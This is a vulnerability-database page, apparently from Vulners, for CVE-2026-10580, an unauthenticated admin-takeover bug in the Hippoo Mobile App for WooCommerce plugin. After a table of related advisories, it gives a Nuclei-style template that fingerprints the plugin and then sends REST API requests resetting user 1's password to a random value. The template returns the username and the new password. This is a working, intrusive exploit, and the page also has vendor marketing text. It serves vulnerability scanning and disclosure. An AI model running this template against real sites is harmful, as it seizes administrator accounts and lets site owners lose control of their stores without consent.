| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Exploit for CVE-2026-10580 | 30 Jun 202609:08 | โ | githubexploit | |
| CVE-2026-10580 | 5 Jun 202618:31 | โ | attackerkb | |
| CVE-2026-10580 | 5 Jun 202620:01 | โ | circl | |
| WordPress plugin Hippoo Mobile App for WooCommerce ๆๆ้ฎ้ขๆผๆด | 5 Jun 202600:00 | โ | cnnvd | |
| CVE-2026-10580 | 5 Jun 202618:31 | โ | cve | |
| CVE-2026-10580 Hippoo Mobile App for WooCommerce <= 1.9.4 - Unauthenticated Authentication Bypass to Administrator Account Takeover via REST API | 5 Jun 202618:31 | โ | cvelist | |
| EUVD-2026-34887 | 5 Jun 202618:31 | โ | euvd | |
| CVE-2026-10580 | 5 Jun 202619:16 | โ | nvd | |
| WordPress Hippoo Mobile App for WooCommerce plugin <= 1.9.4 - Unauthenticated Authentication Bypass to Administrator Account Takeover vulnerability | 9 Jun 202609:25 | โ | patchstack | |
| PT-2026-47026 | 5 Jun 202600:00 | โ | ptsecurity |
id: CVE-2026-10580
info:
name: Hippoo Mobile App for WooCommerce <= 1.9.4 - Authentication Bypass to Admin Account Takeover
author: pussycat0x
severity: critical
description: |
Hippoo Mobile App for WooCommerce WordPress plugin <= 1.9.4 contains an authentication bypass caused by logic conflation in user permission checks, letting unauthenticated attackers take over administrator accounts via REST API password reset.
impact: |
Unauthenticated attackers can reset any WordPress user's password, including administrators, gaining full administrative control of the site.
remediation: |
Update to a version later than 1.9.4 or the latest available version.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-194-unauthenticated-authentication-bypass-to-administrator-account-takeover-via-rest-api
- https://plugins.trac.wordpress.org/changeset/3557733
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-10580
epss-score: 0.02841
epss-percentile: 0.84966
cwe-id: CWE-285
metadata:
max-request: 2
vendor: hippoo
product: hippoo-mobile-app-for-woocommerce
framework: wordpress
verified: true
shodan-query: http.component:"wordpress"
fofa-query: body="hippoo"
tags: cve,cve2026,wordpress,wp-plugin,hippoo,woocommerce,intrusive
variables:
new_password: "{{rand_base(16)}}"
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hippoo/readme.txt"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Hippoo')"
condition: and
internal: true
extractors:
- type: regex
name: plugin_version
part: body
group: 1
regex:
- 'Stable tag:\s*([0-9.]+)'
internal: true
- raw:
- |
POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"password":"{{new_password}}"}
- |
POST /wp-json/wc-hippoo/v1/ext/wp/v2/users/1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"password":"{{new_password}}"}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 || status_code_2 == 200'
- 'contains_any(body, "is_super_admin","capabilities")'
- 'contains(body, "woocommerce_meta")'
condition: and
extractors:
- type: regex
name: username
part: body
group: 1
regex:
- '"username":"([^"]+)"'
- type: dsl
name: new_password
dsl:
- new_password
# digest: 490a0046304402200be4e7d89cc854460644f940dc66b7e73f0491fb94ca662dd100fac3ea64095502200972b8a47f642445d4c6e333a9f3dfee68693458429610969c2796c61649de0b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation